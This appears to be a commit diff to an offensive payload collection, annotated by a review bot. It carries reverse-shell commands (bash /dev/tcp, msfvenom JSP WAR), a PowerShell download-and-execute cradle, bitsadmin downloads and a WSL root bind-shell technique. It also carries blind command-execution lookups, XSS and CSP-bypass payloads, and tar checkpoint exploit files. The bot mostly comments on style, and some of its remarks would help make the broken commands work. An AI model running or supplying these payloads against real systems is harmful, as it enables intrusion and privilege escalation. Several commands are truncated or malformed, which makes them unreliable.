Architecture - Files/Intruder/Images and README + template
@ -10,4 +10,5 @@ wp-admin.php
@ -1,13 +1,16 @@
# Local/Remote File Inclusion
# File Inclusion - Path Traversal
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application
## Summary
* [Path Traversal](#path-traversal)
* [Basic LFI](#basic-lfi)
* [Basic RFI](#basic-rfi)
* [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
* [Wrapper php://filter](l#wrapper-phpfilter)
* [Wrapper php://filter](#wrapper-phpfilter)
* [Wrapper zip://](#wrapper-zip)
* [Wrapper data://](#wrapper-data)
* [Wrapper expect://](#wrapper-expect)
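Review bot: the added sentence `The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application` has no trailing period, while the sentence before it ends with one; that preceding context line also still reads `a "dynamic file inclusion" mechanisms` (singular article with a plural noun), which is worth fixing in the same edit as `a "dynamic file inclusion" mechanism`. The anchor correction from `l#wrapper-phpfilter` to `#wrapper-phpfilter` is right, since GitHub derives `#wrapper-phpfilter` from the `Wrapper php://filter` heading.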
@ -21,6 +24,9 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e
* [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
* [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
## Path Traversal
Linux - Interesting files to check out :
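Review bot: `Linux - Interesting files to check out :` has a space before the colon, which the rest of the README does not use; `Linux - Interesting files to check out:` would match the document's punctuation. Placing the new `## Path Traversal` section ahead of `## Basic LFI` is consistent with its new first position in the Summary.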
@ -81,6 +87,13 @@ The following log files are controllable and can be included with an evil payloa
Other easy win files.
## Basic LFI
@ -40,6 +40,8 @@ bettercap -X --proxy --proxy-https -T <target IP>
nmap -sn -n --disable-arp-ping | grep -v "host down"
-sn : Disable port scanning. Host discovery only.
-n : Never do DNS resolution
* Basic NMAP
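Review bot: as rendered in this hunk, `nmap -sn -n --disable-arp-ping | grep -v "host down"` has no target specification, so nmap would print its usage instead of scanning; the `bettercap` context line on the hunk header uses `<target IP>`, so the same placeholder belongs here unless the render dropped it. The two added option lines are accurate (`-sn` skips port scanning and does host discovery only, `-n` disables DNS resolution); end the `-n` line with a period to match the `-sn` line.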
@ -114,6 +114,14 @@ p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/;cat <&5 | while rea
### War
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
strings reverse.war | grep jsp # in order to get the name of the file
### Lua
Linux only
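Review bot: the placeholders `(IP Address)` and `(Your Port)` in the `msfvenom -p java/jsp_shell_reverse_tcp` line follow a different convention from the `<target IP>` form used in the nmap/bettercap hunk above; `LHOST=<IP> LPORT=<port>` would keep the repository consistent. `Linux only` under `### Lua` is a bare fragment; a full sentence or a parenthetical in the heading would read better.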
@ -1,7 +1,5 @@
# Windows - Privilege Escalation
Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](
## Windows Version and Configuration
@ -132,7 +130,7 @@ REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
### Password in unattend.xml
### Passwords in unattend.xml
Location of the unattend.xml files
@ -167,7 +165,7 @@ Example content
The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
## Processes Enum
## Processes Enumeration
What processes are running?
@ -187,36 +185,32 @@ Do you have powershell magic?
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
## Uploading / Downloading files
## Using PowerSploit's PowerUp
a wget using powershell
powershell -Noninteractive -NoProfile -command "wget -UseBasicParsing -OutFile %TEMP%\wget.exe"
wget using bitsadmin (when powershell is not present)
cmd /c "bitsadmin /transfer myjob /download /priority high %TEMP%\wget.exe"
now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat
## Spot the weak service using PowerSploit's PowerUP
Spot the weak service using PowerSploit's PowerUp
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString(''); Invoke-AllChecks
## Using Windows Subsystem for Linux (WSL)
Technique borrowed from [Warlockobama's tweet](
> With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ <distro>.exe --default-user root. Now start your bind shell or reverse.
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
## Thanks to
* [The Open Source Windows Privilege Escalation Cheat Sheet by and @xxByte](
* [Basic Linux Privilege Escalation](
* [Windows Privilege Escalation Fundamentals](
* [TOP–10 ways to boost your privileges in Windows systems - hackmag](
* [The SYSTEM Challenge](
* [The SYSTEM Challenge](
* [Windows Privilege Escalation Guide - absolomb's security blog](
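Review bot: the WSL launcher name in `./ubuntun1604.exe config --default-user root` appears misspelled; the Ubuntu 16.04 store launcher is `ubuntu1604.exe`. In the same hunk, `(New-Object Net.WebClient).DownloadString('')` has an empty string argument and the `wget -UseBasicParsing -OutFile %TEMP%\wget.exe` call carries no URL, so as shown neither line fetches anything; if these lines survive the edit, use an explicit `<URL>` placeholder, and fix `%TEMP%wget` (missing backslash) in the run-on sentence that follows. `The SYSTEM Challenge` appears twice in the Thanks list; one entry should go unless the two point at different URLs.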
Remote commands execution/Intruders/command_exec.txt → Remote commands execution/Intruder/command_exec.txt
Executable file → Normal file
@ -152,6 +152,10 @@ Based on the tool from `` also hosted at dnsbi
for i in $(ls /) ; do host "http://$"; done
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.')
## Thanks to
* [SECURITY CAFÉ - Exploiting Timed Based RCE](
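Review bot: the command substitution on the last command line, `$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.')`, opens two `$(` but closes only one, so the shell would report an unterminated substitution; the outer `host` call also has no domain suffix after the inner substitution. On the line above, `host` takes a hostname, not a URL, so the `http://` prefix in `host "http://$"` will not resolve as intended, and the `$` reference has lost its variable name (presumably `$i` from the enclosing `for i in $(ls /)` loop).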
SQL injection/Intruders/Auth_Bypass2.txt → SQL injection/Intruder/Auth_Bypass2.txt
Executable file → Normal file
SQL injection/Intruders/Generic_ErrorBased.txt → SQL injection/Intruder/Generic_ErrorBased.txt
Executable file → Normal file
SQL injection/Intruders/Generic_UnionSelect.txt → SQL injection/Intruder/Generic_UnionSelect.txt
Executable file → Normal file
Image diff (inline viewer removed): three images, 179 KiB, 381 KiB and 106 KiB, same size before and after.

@ -168,7 +168,7 @@\@@


## SSRF via URL Scheme
Image diff (inline viewer removed): one image, 44 KiB, same size before and after.
Server Side Template injections/Intruders/ssi_quick.txt → Server Side Template injections/Intruder/ssi_quick.txt
Executable file → Normal file
Tar commands execution/--checkpoint-action=exec=sh → Tar commands execution/Files/--checkpoint-action=exec=sh
Executable file → Normal file
Tar commands execution/--checkpoint=1 → Tar commands execution/Files/--checkpoint=1
Executable file → Normal file
Tar commands execution/ → Tar commands execution/Files/
Executable file → Normal file
Traversal directory/deep_traversal.txt → Traversal directory/Intruder/deep_traversal.txt
Executable file → Normal file
Traversal directory/directory_traversal.txt → Traversal directory/Intruder/directory_traversal.txt
Executable file → Normal file
Traversal directory/dotdotpwn.txt → Traversal directory/Intruder/dotdotpwn.txt
Executable file → Normal file
XSS injection/Intruders/jsonp_endpoint.txt
Normal file
@ -0,0 +1,54 @@
"><embed src='//\"})))}catch(e){alert(1337)}//' allowscriptaccess=always>
"><script src=//></script>
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//></script>
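Review bot: the new file is placed under `XSS injection/Intruders/`, while this same commit renames every other `Intruders/` directory to `Intruder/` (see the SQL injection, Server Side Template injections and Remote commands execution renames); it should land in `XSS injection/Intruder/jsonp_endpoint.txt` so the layout stays uniform.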
@ -778,6 +778,8 @@ Check the CSP on [](https://csp-evaluator.wi
More JSONP endpoints available in [/Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)
### Bypass CSP by [](
Works for CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`, [POC here]("iframe"%29;"pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;)
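Review bot: the link `[/Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)` uses a leading slash in its text but not in its target, and after this commit's `Intruders/` to `Intruder/` rename the target should be `Intruder/jsonp_endpoint.txt`. The `[POC here](...)` link packs a long percent-encoded JavaScript payload into the URL; placing that payload in a code block next to a short link would keep the line readable and easier to maintain.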
Normal file
@ -0,0 +1,26 @@
# Vulnerability Title
> Vulnerability description - reference
- [Tool name - description](
## Summary
* [Something](#something)
* [Something](#something)
* [Subentry 1](#sub1)
* [Subentry 2](#sub2)
## Something
Quick explanation
## Reference
- [Blog title - Author, Date](
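Review bot: the template's Summary uses `#sub1` and `#sub2` as anchors for `Subentry 1` and `Subentry 2`, but GitHub derives anchors from heading text (the existing READMEs use `#path-traversal` for `## Path Traversal`), so modelling `[Subentry 1](#subentry-1)` with a matching `### Subentry 1` heading under `## Something` would teach the right convention; the two identical `[Something](#something)` entries should also differ, or one be dropped, to show a multi-section layout. The sub-entries render without indentation here; if the file does not indent them, they will not nest.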